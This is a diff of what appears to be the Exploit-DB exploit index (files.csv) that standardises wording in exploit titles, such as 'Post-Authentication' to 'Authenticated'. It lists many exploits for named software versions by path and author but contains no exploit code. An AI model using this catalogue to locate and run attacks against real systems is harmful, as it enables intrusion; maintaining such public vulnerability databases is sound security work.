 11811,platforms/php/webapps/11811.txt,"PHPscripte24 Preisschlacht Liveshop System SQL Injection - (seite&aid) index.php",2010-03-19,"Easy Laster",php,webapps,0
 11813,platforms/php/webapps/11813.txt,"DirectAdmin 1.34.4 - Multi Cross-Site Request Forgery",2010-03-19,K053,php,webapps,0
 11814,platforms/php/webapps/11814.txt,"joomla Component & plugin JE Tooltip 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0
 11815,platforms/php/webapps/11815.txt,"joomla Component Gift Exchange com_giftexchange 1.0 Beta - (pkg) SQL Injection",2010-03-20,"Chip d3 bi0s",php,webapps,0
 11816,platforms/php/webapps/11816.txt,"Pay Per Watch & Bid Auktions System - (id_auk) auktion.php Blind SQL Injection",2010-03-20,"Easy Laster",php,webapps,0
 11817,platforms/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution via Cross Application Scripting",2010-03-20,emgent,multiple,remote,0
-11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack Buffer Overflow (1)",2010-03-20,corelanc0d3r,windows,remote,0
+11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1)",2010-03-20,corelanc0d3r,windows,remote,0
 11822,platforms/hardware/remote/11822.txt,"ZKSoftware Biometric Attendence Managnmnet Hardware[MIPS] 2 - Improper Authentication",2010-03-20,fb1h2s,hardware,remote,0
 11823,platforms/cgi/webapps/11823.txt,"Trouble Ticket Software - ttx.cgi Remote File Download",2010-03-20,n01d,cgi,webapps,0
 11824,platforms/php/webapps/11824.py,"Woltlab Burning Board Teamsite Hack 3.0 - ts_other.php SQL Injection",2010-03-21,"Easy Laster",php,webapps,0
@@ -10859,7 +10858,7 @@ id,file,description,date,author,platform,type,port
 11874,platforms/php/webapps/11874.txt,"INVOhost - SQL Injection",2010-03-25,"Andrés Gómez",php,webapps,0
 11875,platforms/php/webapps/11875.py,"Easy-Clanpage 2.01 - SQL Injection",2010-03-25,"Easy Laster",php,webapps,0
 11876,platforms/php/webapps/11876.txt,"justVisual 2.0 - 'index.php' Local File Inclusion",2010-03-25,eidelweiss,php,webapps,0
-11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack Buffer Overflow (2)",2010-03-25,sud0,windows,remote,21
+11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (2)",2010-03-25,sud0,windows,remote,21
 11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - Denial of Service",2010-03-25,_SuBz3r0_,windows,dos,69
 11879,platforms/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote,0
 11880,platforms/hardware/dos/11880.txt,"Lexmark Multiple Laser printers - Remote Stack Overflow",2010-03-25,"Francis Provencher",hardware,dos,0
@@ -10971,7 +10970,7 @@ id,file,description,date,author,platform,type,port
 12007,platforms/php/webapps/12007.txt,"SimpNews 2.16.2 - Multiple SQL Injections",2010-04-01,NoGe,php,webapps,0
 12008,platforms/windows/local/12008.pl,"TugZip 3.5 - '.ZIP' File Buffer Overflow",2010-04-01,Lincoln,windows,local,0
 12009,platforms/php/webapps/12009.html,"CMS Made Simple 1.7 - Cross-Site Request Forgery",2010-04-02,"pratul agrawal",php,webapps,0
-12010,platforms/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorization header Denial of Service",2010-04-02,"zombiefx darkernet",windows,dos,0
+12010,platforms/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorisation Header Denial of Service",2010-04-02,"zombiefx darkernet",windows,dos,0
 12011,platforms/windows/dos/12011.txt,"Google Chrome 4.1 - OOB Array Indexing Bug",2010-04-02,"Tobias Klein",windows,dos,0
 12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - Exploit (2)",2010-04-02,"Richard leahy",windows,local,0
 12015,platforms/php/webapps/12015.txt,"Joomla Component com_menu - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0
@@ -11000,7 +10999,7 @@ id,file,description,date,author,platform,type,port
 12041,platforms/php/webapps/12041.txt,"Solutive CMS - SQL Injection",2010-04-04,"Th3 RDX",php,webapps,0
 12042,platforms/php/webapps/12042.txt,"x10 mirco blogging 121 - SQL Injection",2010-04-04,ITSecTeam,php,webapps,0
 12043,platforms/php/webapps/12043.html,"Prediction League 0.3.8 - Cross-Site Request Forgery (Create Admin User) Exploit",2010-04-04,indoushka,php,webapps,0
-12044,platforms/windows/remote/12044.c,"Easy Ftp Server 1.7.0.2 - MKD Remote Post-Authentication Buffer Overflow",2010-04-04,x90c,windows,remote,0
+12044,platforms/windows/remote/12044.c,"Easy Ftp Server 1.7.0.2 - MKD Remote Authenticated Buffer Overflow",2010-04-04,x90c,windows,remote,0
 12045,platforms/php/webapps/12045.html,"MunkyScripts Simple Gallery - SQL Injection",2010-04-04,ITSecTeam,php,webapps,0
 12047,platforms/php/webapps/12047.html,"nodesforum 1.033 - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0
 12048,platforms/php/webapps/12048.html,"ttCMS 5.0 - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0
@@ -11405,7 +11404,7 @@ id,file,description,date,author,platform,type,port
 12492,platforms/windows/dos/12492.html,"Firefox 3.6.3 - Fork Bomb Denial of Service",2010-05-03,Dr_IDE,windows,dos,0
 12493,platforms/multiple/dos/12493.html,"All Browsers - Long Unicode Denial of Service (PoC)",2010-05-03,Dr_IDE,multiple,dos,0
 12494,platforms/windows/dos/12494.pl,"Winamp 5.572 - Local Crash (PoC)",2010-05-03,R3d-D3V!L,windows,dos,0
-12495,platforms/windows/remote/12495.pl,"ProSSHD 1.2 - Remote Post-Authentication Exploit (ASLR + DEP Bypass)",2010-05-03,"Alexey Sintsov",windows,remote,0
+12495,platforms/windows/remote/12495.pl,"ProSSHD 1.2 - Remote Authenticated Exploit (ASLR + DEP Bypass)",2010-05-03,"Alexey Sintsov",windows,remote,0
 12496,platforms/php/webapps/12496.html,"KubeBlog - Cross-Site Request Forgery",2010-05-03,The.Morpheus,php,webapps,0
 12497,platforms/windows/local/12497.c,"PhotoFiltre Studio X - '.tif' Local Buffer Overflow (PoC)",2010-05-04,"fl0 fl0w",windows,local,0
 12498,platforms/windows/remote/12498.txt,"VicFTPS 5.0 - Directory Traversal",2010-05-04,chr1x,windows,remote,0
@@ -11582,7 +11581,7 @@ id,file,description,date,author,platform,type,port
 12686,platforms/php/webapps/12686.txt,"Online University - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0
 12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - '.wav' (PoC)",2010-05-21,ahwak2000,windows,dos,0
 12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - 'gallery.php' Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0
-12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration console - (Post-Authentication) Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0
+12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration console - (Authenticated) Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0
 12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,php,webapps,0
 12691,platforms/php/webapps/12691.txt,"Online Job Board - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0
 14322,platforms/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
@@ -11630,7 +11629,7 @@ id,file,description,date,author,platform,type,port
 12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - 'news.php' SQL Injection",2010-05-25,"Dr.SiLnT HilL",php,webapps,0
 12737,platforms/php/webapps/12737.txt,"Simpel Side - 'index2.php' SQL Injection",2010-05-25,MN9,php,webapps,0
 12740,platforms/windows/dos/12740.py,"Webby WebServer - PoC SEH control",2010-05-25,m-1-k-3,windows,dos,0
-12741,platforms/windows/dos/12741.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Pre-Authentication Denial of Service",2010-05-25,Dr_IDE,windows,dos,0
+12741,platforms/windows/dos/12741.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Unauthenticated Denial of Service",2010-05-25,Dr_IDE,windows,dos,0
 12743,platforms/php/webapps/12743.txt,"web5000 - (page_show) SQL Injection",2010-05-25,"BLack Revenge",php,webapps,0
 12744,platforms/php/webapps/12744.txt,"Webit CMS - SQL Injection",2010-05-25,CoBRa_21,php,webapps,0
 12746,platforms/php/webapps/12746.txt,"Spaceacre - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-26,XroGuE,php,webapps,0
@@ -12255,7 +12254,7 @@ id,file,description,date,author,platform,type,port
 13902,platforms/asp/webapps/13902.txt,"Ananda Image Gallery - SQL Injection",2010-06-17,"L0rd CrusAd3r",asp,webapps,0
 13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - (SEH) Exploit",2010-06-17,b0nd,windows,remote,0
 13904,platforms/php/webapps/13904.txt,"Planet 1.1 - [Cross-Site Request Forgery] Add Admin Account",2010-06-17,G0D-F4Th3r,php,webapps,0
-13905,platforms/windows/local/13905.py,"BlazeDVD 5.1 - '.plf' Stack Buffer Overflow (PoC) (Windows 7 ALSR + DEP Bypass)",2010-06-17,mr_me,windows,local,0
+13905,platforms/windows/local/13905.py,"BlazeDVD 5.1 - '.plf' Stack Buffer Overflow (PoC) (Windows 7 ASLR + DEP Bypass)",2010-06-17,mr_me,windows,local,0
 13906,platforms/novell/dos/13906.txt,"Netware - SMB Remote Stack Overflow (PoC)",2010-06-17,"laurent gaffie",novell,dos,139
 13907,platforms/windows/local/13907.py,"Winamp 5.572 - Local Buffer Overflow (EIP & SEH DEP Bypass)",2010-06-17,TecR0c,windows,local,0
 13908,platforms/lin_x86-64/shellcode/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0
@@ -12582,7 +12581,7 @@ id,file,description,date,author,platform,type,port
 14309,platforms/windows/remote/14309.html,"RSP MP3 Player OCX 3.2 - ActiveX Buffer Overflow",2010-07-09,blake,windows,remote,0
 14308,platforms/php/webapps/14308.txt,"WordPress Firestats Plugin - Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps,0
 15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow Denial of Service",2010-10-23,d0lc3,windows,dos,0
-14310,platforms/php/webapps/14310.js,"dotDefender 3.8-5 - Pre-Authentication Remote Code Execution (via Cross-Site Scripting)",2010-07-09,rAWjAW,php,webapps,80
+14310,platforms/php/webapps/14310.js,"dotDefender 3.8-5 - Unauthenticated Remote Code Execution (via Cross-Site Scripting)",2010-07-09,rAWjAW,php,webapps,80
 14313,platforms/php/webapps/14313.txt,"Joomla MyHome Component (com_myhome) - Blind SQL Injection",2010-07-10,Sid3^effects,php,webapps,0
 14315,platforms/php/webapps/14315.txt,"Joomla MySms Component (com_mysms) - Arbitrary File Upload",2010-07-10,Sid3^effects,php,webapps,0
 14335,platforms/php/webapps/14335.txt,"Joomla Health & Fitness Stats - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0
@@ -12650,10 +12649,10 @@ id,file,description,date,author,platform,type,port
 14397,platforms/windows/local/14397.rb,"MoreAmp - Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,windows,local,0
 14404,platforms/php/webapps/14404.txt,"Kayako eSupport 3.70.02 - 'functions.php' SQL Injection",2010-07-18,ScOrPiOn,php,webapps,0
 14405,platforms/php/webapps/14405.txt,"PHP-Fusion - Remote Command Execution",2010-07-18,"ViRuS Qalaa",php,webapps,0
-14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - (Post-Authentication) 'MKD' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
-14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - (Post-Authentication) 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
+14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - (Authenticated) 'MKD' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
+14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
 14401,platforms/asp/webapps/14401.txt,"ClickAndRank Script - Authentication Bypass",2010-07-18,walid,asp,webapps,0
-14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - (Post-Authentication) 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0
+14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - (Authenticated) 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0
 14403,platforms/windows/local/14403.txt,"Microsoft Windows - Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0
 14406,platforms/bsd/local/14406.pl,"Ghostscript - '.PostScript' File Stack Overflow",2010-07-18,"Rodrigo Rubira Branco",bsd,local,0
 14407,platforms/aix/remote/14407.c,"rpc.pcnfsd - Remote Format String",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0
@@ -12693,7 +12692,7 @@ id,file,description,date,author,platform,type,port
 14448,platforms/php/webapps/14448.txt,"Joomla Component (com_golfcourseguide) 0.9.6.0 (Beta) / 1 (Beta) - SQL Injection",2010-07-23,Valentin,php,webapps,0
 14449,platforms/php/webapps/14449.txt,"Joomla Component (com_huruhelpdesk) - SQL Injection",2010-07-23,Amine_92,php,webapps,0
 14450,platforms/php/webapps/14450.txt,"Joomla Component (com_iproperty) - SQL Injection",2010-07-23,Amine_92,php,webapps,0
-14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - (Post-Authentication) 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0
+14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0
 14452,platforms/linux/dos/14452.txt,"FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,linux,dos,0
 14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0
 14454,platforms/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0
@@ -12722,7 +12721,7 @@ id,file,description,date,author,platform,type,port
 14484,platforms/windows/dos/14484.html,"Microsoft Internet Explorer 6 / 7 - Remote Denial of Service",2010-07-27,"Richard leahy",windows,dos,0
 14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion",2010-07-27,"John Leitch",php,webapps,0
 14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys 1.5.2.755 - Privilege Escalation",2010-07-28,th_decoder,windows,local,0
-14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - (Post-Authentication) HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0
+14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - (Authenticated) HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0
 14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdiskyou,windows,local,0
 14488,platforms/php/webapps/14488.txt,"joomla Component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0
 14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 - utf8 Directory Traversal (2)",2010-07-28,mywisdom,unix,remote,0
@@ -12819,7 +12818,7 @@ id,file,description,date,author,platform,type,port
 14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0
 14621,platforms/windows/dos/14621.py,"Abac Karaoke 2.15 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0
 14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition - Permanent Cross-Site Scripting",2010-08-11,fdiskyou,php,webapps,0
-14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - (Post-Authentication) Multiple Commands Remote Buffer Overflow",2010-08-11,"Glafkos Charalambous ",windows,remote,21
+14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflow",2010-08-11,"Glafkos Charalambous ",windows,remote,21
 14624,platforms/windows/dos/14624.py,"JaMP Player 4.2.2.0 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0
 14625,platforms/windows/dos/14625.py,"CombiWave Lite 4.0.1.4 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0
 14628,platforms/win_x86/webapps/14628.txt,"PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion",2010-08-12,LoSt.HaCkEr,win_x86,webapps,80
@@ -13185,7 +13184,7 @@ id,file,description,date,author,platform,type,port
 15139,platforms/asp/webapps/15139.txt,"AtomatiCMS - Upload Arbitrary File",2010-09-28,Abysssec,asp,webapps,0
 15141,platforms/php/webapps/15141.txt,"JE CMS 1.0.0 - Authentication Bypass (via SQL Injection)",2010-09-28,Abysssec,php,webapps,0
 15144,platforms/windows/webapps/15144.txt,"Aleza Portal 1.6 - Insecure (SQL Injection) Cookie Handling",2010-09-28,KnocKout,windows,webapps,0
-15145,platforms/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorization Flaws",2010-09-28,"Pablo Milano",php,webapps,0
+15145,platforms/php/webapps/15145.txt,"Achievo 1.4.3 - Multiple Authorisation Flaws",2010-09-28,"Pablo Milano",php,webapps,0
 15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - Cross-Site Request Forgery",2010-09-28,"Pablo Milano",php,webapps,0
 15147,platforms/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent Cross-Site Scripting",2010-09-28,"SecPod Research",php,webapps,0
 15148,platforms/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0
@@ -13259,7 +13258,7 @@ id,file,description,date,author,platform,type,port
 15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - '.m3u' Buffer Overflow",2010-11-23,0v3r,windows,local,0
 15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution",2010-11-23,Rew,windows,remote,0
 15601,platforms/windows/remote/15601.html,"ImageShack Toolbar 4.8.3.75 - Remote Code Execution",2010-11-23,Rew,windows,remote,0
-15602,platforms/php/webapps/15602.txt,"PHPMotion 1.62 - 'FCKeditor' File Upload",2010-11-23,trycyber,php,webapps,0
+15602,platforms/php/webapps/15602.txt,"PHPMotion 1.62 - 'FCKeditor' Arbitrary File Upload",2010-11-23,trycyber,php,webapps,0
 15605,platforms/php/webapps/15605.txt,"Getsimple CMS 2.01 < 2.02 - Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0
 15229,platforms/windows/dos/15229.pl,"FoxPlayer 2.3.0 - '.m3u' Buffer Overflow",2010-10-10,"Anastasios Monachos",windows,dos,0
 15230,platforms/asp/webapps/15230.txt,"Site2Nite Auto e-Manager - SQL Injection",2010-10-10,KnocKout,asp,webapps,0
@@ -13364,7 +13363,7 @@ id,file,description,date,author,platform,type,port
 15346,platforms/multiple/dos/15346.c,"Platinum SDK Library - post upnp sscanf Buffer Overflow",2010-10-28,n00b,multiple,dos,0
 15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - soap_action_name post upnp sscanf Buffer Overflow",2010-10-28,n00b,windows,remote,0
 15348,platforms/php/webapps/15348.txt,"Pub-Me CMS - Blind SQL Injection",2010-10-28,H4f,php,webapps,0
-15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Post-Authentication Directory Traversal",2010-10-29,chr1x,windows,remote,0
+15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote,0
 15350,platforms/php/webapps/15350.rb,"PHPKit 1.6.1 R2 - overview.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0
 15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System 7.5 - game.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0
 15352,platforms/windows/remote/15352.html,"Firefox 3.6.8 < 3.6.11 - Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0
@@ -13761,7 +13760,7 @@ id,file,description,date,author,platform,type,port
 15839,platforms/windows/dos/15839.php,"Microsoft Windows Fax Services Cover Page Editor - '.cov' Memory Corruption",2010-12-28,rgod,windows,dos,0
 15840,platforms/php/webapps/15840.txt,"ardeaCore 2.25 - PHP Framework Remote File Inclusion",2010-12-29,n0n0x,php,webapps,0
 15842,platforms/hardware/remote/15842.txt,"DD-WRT 24-preSP2 - Information Disclosure",2010-12-29,"Craig Heffner",hardware,remote,0
-15843,platforms/php/webapps/15843.txt,"News Script PHP Pro - 'FCKeditor' File Upload",2010-12-29,Net.Edit0r,php,webapps,0
+15843,platforms/php/webapps/15843.txt,"News Script PHP Pro - 'FCKeditor' Arbitrary File Upload",2010-12-29,Net.Edit0r,php,webapps,0
 15846,platforms/php/webapps/15846.txt,"kaibb 1.0.1 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0
 15847,platforms/php/webapps/15847.txt,"DzTube - SQL Injection",2010-12-29,"errnick qwe",php,webapps,0
 15848,platforms/php/webapps/15848.txt,"PHP-AddressBook 6.2.4 - (group.php) SQL Injection",2010-12-29,hiphop,php,webapps,0
@@ -13984,7 +13983,7 @@ id,file,description,date,author,platform,type,port
 16145,platforms/windows/remote/16145.pl,"Unreal Tournament - Remote Buffer Overflow (SEH)",2011-02-09,Fulcrum,windows,remote,0
 16183,platforms/php/webapps/16183.txt,"GAzie 5.10 - (Login Parameter) Multiple Vulnerabilities",2011-02-17,LiquidWorm,php,webapps,0
 16165,platforms/php/webapps/16165.txt,"AWCM 2.2 Final - Persistent Cross-Site Script",2011-02-14,_84kur10_,php,webapps,0
-16166,platforms/windows/dos/16166.py,"Microsoft Windows 2003 - AD Pre-Authentication BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0
+16166,platforms/windows/dos/16166.py,"Microsoft Windows 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0
 16148,platforms/php/webapps/16148.txt,"SourceBans 1.4.7 - Cross-Site Scripting",2011-02-09,Sw1tCh,php,webapps,0
 16149,platforms/hardware/remote/16149.txt,"Linksys WAP610N - Unauthenticated Root Access Security",2011-02-10,"Matteo Ignaccolo",hardware,remote,0
 16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 - (TYPE) Denial of Service",2011-02-10,"Houssam Sahli",windows,dos,0
@@ -14005,7 +14004,7 @@ id,file,description,date,author,platform,type,port
 16176,platforms/windows/remote/16176.pl,"ActFax Server (LPD/LPR) 4.25 Build 0221 (2010-02-11) - Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0
 16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0
 16175,platforms/php/webapps/16175.txt,"Seo Panel 2.2.0 - SQL Injection",2011-02-15,"High-Tech Bridge SA",php,webapps,0
-16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Post-Authentication) Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0
+16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Authenticated) Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0
 16178,platforms/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0
 16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0
 16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - '.csv' Denial of Service",2011-02-17,b0telh0,windows,dos,0
@@ -14087,7 +14086,7 @@ id,file,description,date,author,platform,type,port
 16276,platforms/php/webapps/16276.txt,"ADAN Neuronlabs - 'view.php' SQL Injection",2011-03-04,IRAQ_JAGUAR,php,webapps,0
 16278,platforms/ios/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,ios,remote,0
 16279,platforms/php/webapps/16279.txt,"MySms 1.0 - Multiple Vulnerabilities",2011-03-05,"AtT4CKxT3rR0r1ST ",php,webapps,0
-16280,platforms/php/webapps/16280.py,"Vtiger CRM 5.0.4 - Pre-Authentication Local File Inclusion",2011-03-05,TecR0c,php,webapps,0
+16280,platforms/php/webapps/16280.py,"Vtiger CRM 5.0.4 - Unauthenticated Local File Inclusion",2011-03-05,TecR0c,php,webapps,0
 16281,platforms/php/webapps/16281.txt,"BoutikOne - 'description.php' SQL Injection",2011-03-05,IRAQ_JAGUAR,php,webapps,0
 16283,platforms/win_x86/shellcode/16283.txt,"Win32 - eggsearch Shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode,0
 16284,platforms/unix/dos/16284.rb,"Subversion - Date Svnserve",2010-08-07,Metasploit,unix,dos,0
@@ -14579,22 +14578,22 @@ id,file,description,date,author,platform,type,port
 16771,platforms/windows/remote/16771.rb,"EasyFTP Server 1.7.0.11 - list.html path Stack Buffer Overflow",2010-08-17,Metasploit,windows,remote,8080
 16772,platforms/windows/remote/16772.rb,"EFS Easy Chat Server - Authentication Request Handling Buffer Overflow",2010-08-06,Metasploit,windows,remote,80
 16773,platforms/windows/remote/16773.rb,"Novell eDirectory NDS Server - Host Header Overflow",2010-05-09,Metasploit,windows,remote,8028
-16774,platforms/windows/remote/16774.rb,"HP OpenView NNM 7.53/7.51 - OVAS.exe Pre-Authentication Stack Buffer Overflow",2010-10-12,Metasploit,windows,remote,0
+16774,platforms/windows/remote/16774.rb,"HP OpenView NNM 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow",2010-10-12,Metasploit,windows,remote,0
 16775,platforms/windows/remote/16775.rb,"RhinoSoft Serv-U - Session Cookie Buffer Overflow",2010-03-10,Metasploit,windows,remote,0
 16776,platforms/windows/remote/16776.rb,"Alt-N WebAdmin - USER Buffer Overflow",2010-02-15,Metasploit,windows,remote,0
 16777,platforms/windows/remote/16777.rb,"Free Download Manager - Remote Control Server Buffer Overflow",2010-07-13,Metasploit,windows,remote,80
 16778,platforms/windows/remote/16778.rb,"Race River Integard Home/Pro - LoginAdmin Password Stack Buffer Overflow",2010-12-15,Metasploit,windows,remote,18881
 16779,platforms/windows/remote/16779.rb,"Now SMS/Mms Gateway - Buffer Overflow",2010-05-09,Metasploit,windows,remote,8800
 16780,platforms/cgi/remote/16780.rb,"HP OpenView Network Node Manager - Snmp.exe CGI Buffer Overflow",2010-11-11,Metasploit,cgi,remote,0
-16781,platforms/windows/remote/16781.rb,"MailEnable - Authorization Header Buffer Overflow",2010-07-07,Metasploit,windows,remote,0
+16781,platforms/windows/remote/16781.rb,"MailEnable - Authorisation Header Buffer Overflow",2010-07-07,Metasploit,windows,remote,0
 16782,platforms/windows/remote/16782.rb,"Apache (Windows/x86) - (Windows/x86) Chunked Encoding",2010-07-07,Metasploit,windows,remote,0
 16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Overflow Exploit",2010-09-20,Metasploit,win_x86,remote,0
 16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (1)",2010-11-22,Metasploit,multiple,remote,80
 16785,platforms/windows/remote/16785.rb,"Hewlett-Packard Power Manager Administration - Buffer Overflow",2010-11-24,Metasploit,windows,remote,80
 16786,platforms/windows/remote/16786.rb,"PeerCast 0.1216 (Windows/x86) - URL Handling Buffer Overflow",2010-09-20,Metasploit,windows,remote,7144
 16787,platforms/windows/remote/16787.rb,"Ipswitch WhatsUp Gold 8.03 - Buffer Overflow",2010-07-14,Metasploit,windows,remote,0
-16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload and Execution",2010-11-24,Metasploit,cfm,webapps,0
-16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload and Execution",2010-11-24,Metasploit,multiple,remote,8080
+16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload / Execution",2010-11-24,Metasploit,cfm,webapps,0
+16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution",2010-11-24,Metasploit,multiple,remote,8080
